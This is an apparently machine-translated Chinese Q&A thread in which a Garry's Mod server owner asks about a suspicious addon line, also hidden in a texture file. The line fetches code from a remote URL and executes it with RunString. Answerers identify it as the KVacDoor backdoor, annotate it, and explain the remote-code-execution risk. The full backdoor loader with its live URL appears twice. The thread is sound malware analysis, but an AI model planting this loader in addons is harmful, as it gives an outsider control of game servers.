我收到了一个sus版本的插件(gmod(,里面有这个:
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b) RunString(b, ":", false) end)end)
还有"materials/npc/"中另一个名为"help.vtf"的文件,里面有相同的代码。
你能帮我知道这是后门还是其他恶意程序吗?
(我还添加到总lua文件中:https://mega.nz/file/tLtnwC4Y#r5wqK-JRQPm3BZrA3x9FUIkzw5rjXgFq4HG8pf0yuMA(
该代码是恶意的,该代码是一个名为KVacDoor的常见后门,它允许开发人员执行lua脚本、控制台命令并控制您的服务器文件。
如果按照提取请求的基本URLhttps://kvac.cz您可以了解更多关于这个后门及其功能的信息。
我建议卸载这个插件。
我们无法判断。下载&然而,执行下载的代码是一个明显的远程代码执行(RCE(漏洞。也许这是为了";保护";源(其中"密钥"将是许可证密钥或类似密钥(,或者作为提供我们不知道的简单更新的一种方式。
链接可能由分发脚本的人控制。它可能会尝试验证PHP代码中的密钥,并在其有效的情况下使用脚本进行响应;你答案中的密钥可能已过期。你不可能知道这个服务器是做什么的。您是否信任此服务器始终使用无病毒脚本进行响应?我不会的。只有当用户代理是Garry的Mod(以减少在浏览器中查看脚本的基本尝试(时,它才可能在万圣节、每月10日、午夜等向您发送恶意代码。
TL;DR:这是一个RCE漏洞。您必须完全信任服务器才能信任脚本。
它是否是恶意的完全取决于你希望它做什么。如果你不希望它从互联网上下载一些随机文件并将其作为代码运行,那么是的,它是恶意的。
我不熟悉这个API,所以我只是从它们的名称猜测函数的作用:
timer.Simple(1, function() -- Some sort of timer to run the code after some delay
-- Download a file from some URL
http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b)
-- Probably a callback function that runs when the file from the given
-- URL has finished downloading. The `b` parameter is probably the
-- content of the downloaded file.
RunString(b, ":", false) -- Going by the name: Takes a string (b) and runs it
-- like normal Lua code. No clue what the ":" does
end)
end)
打开URL不会带来任何结果,但可能服务器正在寻找一些特定的请求标头,以确保您实际上无法检查代码。
如果你真的想知道,你可以尝试修改代码以显示下载的代码,而不是运行它,风险自负,但这可能不值得错过一些东西。